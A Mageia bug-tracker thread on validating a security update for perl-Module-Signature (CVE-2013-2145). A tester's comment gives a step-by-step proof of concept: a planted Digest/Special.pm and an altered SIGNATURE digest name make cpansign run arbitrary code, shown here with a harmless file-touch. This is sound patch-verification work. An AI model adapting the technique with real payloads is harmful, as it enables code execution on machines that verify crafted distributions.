Fedora has issued an advisory on June 9: https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109387.html Mageia 2 and Mageia 3 are also affected. Reproducible: Steps to Reproduce:
CC: (none) => shlomifWhiteboard: (none) => MGA3TOO, MGA2TOO
Hi David, thanks for the report. Updates pushed to Mageia 2, Mageia 3 and Mageia Cauldron: http://pkgsubmit.mageia.org/ Regards, -- Shlomi Fish
Thanks Shlomi! If anyone wants to provide a more descriptive CVE summary, feel free :o) More info is here: http://openwall.com/lists/oss-security/2013/06/05/16 Advisory: ======================== Updated perl-Module-Signature package fixes security vulnerability: Arbitrary code execution vulnerability in Module::Signature before 0.72 (CVE-2013-2145). References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2145 https://lists.fedoraproject.org/pipermail/package-announce/2013-June/109387.html ======================== Updated packages in core/updates_testing: ======================== perl-Module-Signature-0.730.0-1.mga2 perl-Module-Signature-0.730.0-1.mga3 from SRPMS: perl-Module-Signature-0.730.0-1.mga2.src.rpm perl-Module-Signature-0.730.0-1.mga3.src.rpm
CC: (none) => jquelinVersion: Cauldron => 3Assignee: jquelin => qa-bugsWhiteboard: MGA3TOO, MGA2TOO => MGA2TOO
Testing complete MGA2 x86_64 Here is my testing procedure: As root: 1) install perl-Module-Signature 2) as root, create /usr/lib/perl5/vendor_perl/{your_version}/Digest/Special.pm # cat Special.pm system("touch /tmp/evilFile"); As a normal user: 1) make sure you already have a gpg key as your normal user, or create one with gpg --gen-key 2) rm -f /tmp/evilFile #justInCase 3) Then: $ mkdir test-signature $ cd test-signature $ vim MANIFEST $ cat MANIFEST MANIFEST $ cpansign sign [...] $ ls MANIFEST SIGNATURE $ cat SIGNATURE This file contains message digests of all files listed in MANIFEST, signed via the Module::Signature module, version 0.68. To verify the content in this distribution, first make sure you have Module::Signature installed, then type: % cpansign -v It will check each file's integrity, as well as the signature's validity. If "==> Signature verified OK! <==" is not displayed, the distribution may already have been compromised, and you should not run its Makefile.PL or Build.PL. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SHA1 a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQEcBAEBAgAGBQJRyZLoAAoJEADHAciX3Qg1se0H/RSnw9Eu8ERwVc0NjhqCWcOz XhcFUcsiWuIlKRu5tvEI0TtGUCOsgg0uHGHKdy8955XLFNQtcyb6MmyjxV04LGDu o/hbarrnnzNVnFO14ECwmm6cl3X6CplJd4IWps9IeTPkFyqGiJiSgXkbG7Nopw14 15LNkFozqhy11F5CfkgoUDr7mn73AEsFi6beoTZi+Q2m1bdvvkPCSQy9d0sFPibS tlXje2+tvzfo0jWQrefyWiA5Z9I9wTZyDfWBb06Sk5pYcoocGthgJbyl2ykgt7D7 7MKRL3c6XMNIXgkGqNfSJuNRCqfbjtN6LSqcW5sut+5ZTz1h5AAzeO7bQwcUAw4= =lX23 -----END PGP SIGNATURE----- Now we will alter this signature file, changing the "SHA1 a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST" line [samuel.verschelde@tech009 test-signature]$ vim SIGNATURE [samuel.verschelde@tech009 test-signature]$ cat SIGNATURE This file contains message digests of all files listed in MANIFEST, signed via the Module::Signature module, version 0.68. To verify the content in this distribution, first make sure you have Module::Signature installed, then type: % cpansign -v It will check each file's integrity, as well as the signature's validity. If "==> Signature verified OK! <==" is not displayed, the distribution may already have been compromised, and you should not run its Makefile.PL or Build.PL. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Special a852db4db68bb42ec01d35714ccfd4c299948d0e MANIFEST -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQEcBAEBAgAGBQJRyZLoAAoJEADHAciX3Qg1se0H/RSnw9Eu8ERwVc0NjhqCWcOz XhcFUcsiWuIlKRu5tvEI0TtGUCOsgg0uHGHKdy8955XLFNQtcyb6MmyjxV04LGDu o/hbarrnnzNVnFO14ECwmm6cl3X6CplJd4IWps9IeTPkFyqGiJiSgXkbG7Nopw14 15LNkFozqhy11F5CfkgoUDr7mn73AEsFi6beoTZi+Q2m1bdvvkPCSQy9d0sFPibS tlXje2+tvzfo0jWQrefyWiA5Z9I9wTZyDfWBb06Sk5pYcoocGthgJbyl2ykgt7D7 7MKRL3c6XMNIXgkGqNfSJuNRCqfbjtN6LSqcW5sut+5ZTz1h5AAzeO7bQwcUAw4= =lX23 -----END PGP SIGNATURE----- Now we run cpansign to verify the signature, thus tricking cpansign into executing our Special.pm evil script. [samuel.verschelde@tech009 test-signature]$ cpansign Unknown cipher: Special, please install Digest::Special Can't call method "add" on an undefined value at /usr/lib/perl5/vendor_perl/5.12.3/Module/Signature.pm line 601, <F> chunk 1. There are errors, because I haven't created a proper Special.rpm script, but this is enough for the test because: [samuel.verschelde@tech009 test-signature]$ ls /tmp/evilFile /tmp/evilFile The evil action has worked. Then install the update candidate, remove /tmp/evilFile, run cpansign again in the appropriate directory, see that it hasn't created the evilFile. Then don't forget to remove that Special.pm you created. $ cpansign Malformed algorithm name: Special (should match /\w+\d+/) at /usr/lib/perl5/vendor_perl/5.14.2/Module/Signature.pm line 541.
Whiteboard: MGA2TOO => MGA2TOO has_procedure MGA2-64-OK
Testing complete on Mageia 3 i586, following Stormi's procedure in comment 3. That's nice for once, to be able to reproduce a security vulnerabity :)
Whiteboard: MGA2TOO has_procedure MGA2-64-OK => MGA2TOO has_procedure MGA2-64-OK MGA3-32-OK
Testing complete on Mageia 2 i586.
Whiteboard: MGA2TOO has_procedure MGA2-64-OK MGA3-32-OK => MGA2TOO has_procedure MGA2-32-OK MGA2-64-OK MGA3-32-OK
testing mga3 64
Testing complete mga3 64 Thanks for the procedure Samuel. Validating. Advisory uploaded. Could sysadmin please push from 2 & 3 core/updates_testing to core/updates Thanks!
Keywords: (none) => validated_updateWhiteboard: MGA2TOO has_procedure MGA2-32-OK MGA2-64-OK MGA3-32-OK => MGA2TOO has_procedure MGA2-32-OK MGA2-64-OK MGA3-32-OK mga3-64-okCC: (none) => sysadmin-bugs
http://advisories.mageia.org/MGASA-2013-0184.html
Status: NEW => RESOLVEDCC: (none) => boklmResolution: (none) => FIXED
CC: boklm => (none)